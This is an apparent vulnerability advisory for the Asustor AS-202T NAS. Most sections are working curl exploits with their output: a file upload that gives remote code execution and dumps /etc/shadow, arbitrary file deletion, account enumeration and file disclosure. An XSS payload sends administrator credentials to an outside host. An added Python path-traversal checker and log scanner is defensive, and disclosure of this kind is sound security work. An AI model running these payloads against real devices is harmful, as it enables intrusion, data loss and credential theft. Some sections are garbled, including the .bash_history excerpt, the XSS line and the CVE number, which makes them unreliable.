Multiple vulnerabilities were found while researching the Asustor AS-202T NAS.

CVE-2018-15694: Authenticated file upload

An authenticated remote non-administrative attacker can upload a file to any location on the target file system. The target always names the uploaded file WallPaper_1.jpg. If the Web Server feature is enabled, a remote unauthenticated attacker can then obtain remote code execution by writing the file into /cgi-bin/.

$ curl -k -X POST -H 'Content-Type: multipart/form-data; boundary=-pwned-' --data-binary $'-pwned-\x0d\x0aContent-Disposition: form-data; filename=\"1.jpg\"\x0d\x0a\x0d\x0a#!/bin/sh\x0aecho -e \"Content-Type: text/plain\\n\\n\";id;uname -a;cat /etc/shadow\x0d\x0a-pwned-\x0d\x0a' $'https://192.168.1.10:8001/portal/apis/wallpaper/uploadwallpaper.cgi?sid=9dpDW4U9jUm.2HNb&act=upload&appdirpath=../../../share/Web/cgi-bin/'
{ "success": true }

$ curl -k http://192.168.1.10:80/cgi-bin/WallPaper_1.jpg
uid=999(admin) gid=999(administrators) groups=100(users),997(nvradmins),999(administrators)
Linux Clarke 3.10.70 #1 SMP Wed Jun 13 01:06:06 CST 2018 armv7l GNU/Linux
root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7:::
avahi:*:15259:0:99999:7:::
...
CVE-2018-15695: Authenticated arbitrary file deletion

An authenticated remote non-administrative user can delete any file on the file system because of a path traversal vulnerability in wallpaper.cgi.

$ curl -k "https://192.168.1.10:8001/portal/apis/wallpaper/wallpaper.cgi?sid=2LEyW3.EhAYUCWVF&act=removewallpaper&appdirpath=../../../tmp&file=test.file"
{ "success": true }
CVE-2018-15696: Authenticated account enumeration

An authenticated remote non-administrative user can list all accounts on the device through user.cgi.

$ curl -s -k "https://192.168.1.10:8001/portal/apis/accessControl/user.cgi?sid=C8wyW20b6wYUz31g&act=list&start=0&limit=0&domain=0" | python -m json.tool
{
    "datas": [
        {
            "description": "guest",
            "email": "",
            "group": "-",
            "name": "guest",
            "primary_gid": 65534,
            "status": "Inactive",
            "uid": 998
        },
        {
            "description": "Admin",
            "email": "",
            "group": "administrators",
            "name": "admin",
            "primary_gid": 999,
            "status": "Active",
            "uid": 999
        },
        {
            "description": "",
            "email": "",
            "group": "users",
            "name": "courtney",
            "primary_gid": 100,
            "status": "Active",
            "uid": 1000
        },
        {
            "description": "",
            "email": "",
            "group": "users",
            "name": "lab",
            "primary_gid": 100,
            "status": "Active",
            "uid": 1001
        }
    ],
    "success": true,
    "total": 4
}
CVE-2018-15697: Authenticated file disclosure

An authenticated remote non-administrative user can read files on the NAS shares by specifying a full file path in a request to downloadwallpaper.cgi. In the example below, the bash history file is retrieved from /Home/admin/.

[Retrieved .bash_history excerpt; the request and most of the output are garbled in the source, only fragments of netstat -an, netstat -a and a TCP port 51417 entry are recognizable]
CVE-2018-15698: Authenticated file disclosure

An authenticated remote administrative user can read the contents of arbitrary files on the remote target by sending a request to loginimage.cgi.

$ curl -k "https://192.168.1.10:8001/portal/apis/settings/loginimage.cgi?sid=4K4yW-gqeQazweZ0&act=preview&file=/etc/shadow"
root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7:::
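The four path-handling bugs above (CVE-2018-15694, -15695, -15697, -15698) share one root cause: a user-supplied path (appdirpath or file) is joined onto a base directory without checking that the result stays inside it. The following is an added example, not code from the advisory or from Asustor: it shows the containment check those CGI handlers need, and reuses it to flag matching requests in a web access log. The wallpaper base directory, the log format and the log lines are all constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

WALLPAPER_BASE = "/usr/builtin/var/wallpaper"  # assumed; real path not in the advisory

# Endpoint -> query parameter that carries a path (names taken from the advisory)
PATH_PARAMS = {
    "/portal/apis/wallpaper/uploadwallpaper.cgi": "appdirpath",
    "/portal/apis/wallpaper/wallpaper.cgi": "appdirpath",
    "/portal/apis/wallpaper/downloadwallpaper.cgi": "file",
    "/portal/apis/settings/loginimage.cgi": "file",
}

def escapes_base(user_path: str, base: str = WALLPAPER_BASE) -> bool:
    """True if joining user_path onto base leaves base.
    os.path.join discards base when user_path is absolute (the /etc/shadow case),
    and normpath collapses the ../ segments (the appdirpath cases), so a single
    commonpath check catches both."""
    target = os.path.normpath(os.path.join(base, user_path))
    return os.path.commonpath([base, target]) != base

LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def flag_request(line: str):
    """Return (endpoint, parameter, decoded value) if the request's path
    parameter escapes the wallpaper directory, otherwise None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    param = PATH_PARAMS.get(url.path)
    if param is None:
        return None
    for value in parse_qs(url.query).get(param, []):  # parse_qs percent-decodes
        if escapes_base(value):
            return (url.path, param, value)
    return None

def scan(lines):
    return [hit for hit in map(flag_request, lines) if hit]

# Constructed combined-format log lines (session ids and client IPs are made up)
SAMPLE_LOG = [
    '192.168.1.50 - - [15/Aug/2018:10:01:02 +0000] "POST /portal/apis/wallpaper/uploadwallpaper.cgi?sid=AAAA&act=upload&appdirpath=..%2F..%2F..%2Fshare%2FWeb%2Fcgi-bin%2F HTTP/1.1" 200 18',
    '192.168.1.50 - - [15/Aug/2018:10:01:05 +0000] "GET /portal/apis/wallpaper/wallpaper.cgi?sid=AAAA&act=removewallpaper&appdirpath=../../../tmp&file=test.file HTTP/1.1" 200 18',
    '192.168.1.50 - - [15/Aug/2018:10:01:09 +0000] "GET /portal/apis/settings/loginimage.cgi?sid=AAAA&act=preview&file=/etc/shadow HTTP/1.1" 200 70',
    '192.168.1.51 - - [15/Aug/2018:10:02:00 +0000] "GET /portal/apis/wallpaper/wallpaper.cgi?sid=BBBB&act=removewallpaper&appdirpath=.&file=old.jpg HTTP/1.1" 200 18',
]

if __name__ == "__main__":
    for endpoint, param, value in scan(SAMPLE_LOG):
        print(f"traversal attempt: {endpoint} {param}={value}")
```

The last sample line is a legitimate request inside the wallpaper directory and is not flagged; the first three reproduce the advisory's traversal patterns and are.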
CVE-2018-1569: MITM XSS

After a remote administrative user authenticates, the NAS performs a wget of http://update.asustor.com/adm_update.php?architecture=armv7l&model=AS1004T&version=3.1.0.RFQ3&initialized=true over plain HTTP and parses the resulting .conf file. An example file:

ModelName = AS10XXT
Version = 3.1.4.RID1
ReleaseDate = 2018/06/14
ReleaseNote

A man-in-the-middle can modify the version field to inject JavaScript that steals the administrator's credentials, for example:

Version=pnme![](http://192.168.1.237/pwn?c=)